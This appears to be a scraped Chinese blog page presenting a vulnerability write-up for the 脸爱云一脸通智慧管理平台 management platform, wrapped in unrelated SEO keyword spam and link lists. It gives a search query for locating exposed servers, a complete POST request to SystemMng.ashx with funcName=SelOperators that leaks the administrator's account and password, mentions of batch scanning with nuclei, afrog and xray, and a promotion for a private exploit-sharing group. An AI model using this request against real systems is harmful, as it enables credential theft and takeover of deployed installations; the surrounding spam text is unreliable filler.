当前位置: 首页 > news >正文

怎么搭建本地网站东平县建设局网站

怎么搭建本地网站,东平县建设局网站,2023年互联网创业项目,宠物网站素材0x01 产品简介 脸爱云一脸通智慧管理平台是一套功能强大,运行稳定,操作简单方便,用户界面美观,轻松统计数据的一脸通系统。无需安装,只需在后台配置即可在浏览器登录。 功能包括:系统管理中心、人员信息管理中心、设备…

0x01 产品简介

脸爱云一脸通智慧管理平台是一套功能强大,运行稳定,操作简单方便,用户界面美观,轻松统计数据的一脸通系统。无需安装,只需在后台配置即可在浏览器登录。
功能包括:系统管理中心、人员信息管理中心、设备管理中心、消费管理子系统、订餐管理子系统、水控管理子系统、电控管理子系统、考勤管理子系统、门禁通道管理子系统、会议签到管理子系统、访客管理子系统。

0x02 漏洞概述

脸爱云一脸通智慧管理平台存在信息泄露漏洞,该漏洞源于SystemMng.ashx接口处存在信息泄露漏洞,攻击者能够利用该漏洞通过SelOperators参数泄露的当前管理员的敏感信息,包括账号密码登录系统后台。

0x03 搜索语法

body="View/UserReserved/UserReservedTest.aspx"

在这里插入图片描述

0x04 漏洞复现

POST /SystemMng.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: closeusername=admin&funcName=SelOperators

在这里插入图片描述

0x05 工具批量

nuclei

在这里插入图片描述

afrog

在这里插入图片描述

xray

在这里插入图片描述

POC脚本获取

请使用VX扫一扫加入内部POC脚本分享圈子
在这里插入图片描述

http://www.yayakq.cn/news/813547/

相关文章:

  • 网站做系统九一赣州人才网
  • 中国建设银行陕西省分行网站建立企业网站 优帮云
  • 兰州网站建设张家界做网站找哪家好
  • 文案转行做网站编辑网站的建设的项目介绍怎么写
  • 北京小程序网站制作百度点击排名收费软件
  • 网站前台设计过程宿迁东岸网络技术有限公司
  • 湖南长沙网站建局域网网站建设的步骤过程
  • 网站从建设到运行要多少钱珠海网站网站建设
  • 商城网站一般用什么做二次开发贵州省公路建设有限公司网站
  • 网站再就业技能培训班建设银行网站用户权限
  • 设计类的网站和简介青岛网络科技公司排名
  • 什么网站能代做预算西安有哪些互联网公司
  • 免费广告推广平台网站推广优化怎么做最好
  • 建设一个好的网站温州网站建设公司排名
  • 无代码网站开发平台有哪些1688一件代发详细步骤
  • 网站后台上传软件自动跳转短网址
  • 郑州网站优化怎样做莆田制作网站企业
  • 温州58同城怎么做网站网站建设需要什么技能
  • 客户评价网站建设wordpress邮件重置密码
  • 城乡建设局网站首页怎么做自己公司的网页
  • 网站域名证书芜湖十大网络公司
  • 做聚美优品网站得多少钱百度关键词搜索排行榜
  • 门户网站是不是新媒体wordpress 自媒体主题
  • 专业企业建站系统网站销售方案
  • 郑州的做网站公司有哪些闵行网页设计师
  • 网站 dns 解析石家庄网站建设石家庄
  • 北京工程建设质量协会网站企业网站模板下载
  • 国际网站开发客户古典家具网站模板
  • 免费网站推广渠道网站优化北京
  • 网站建设及推广费记什么科目一个新手如何做网站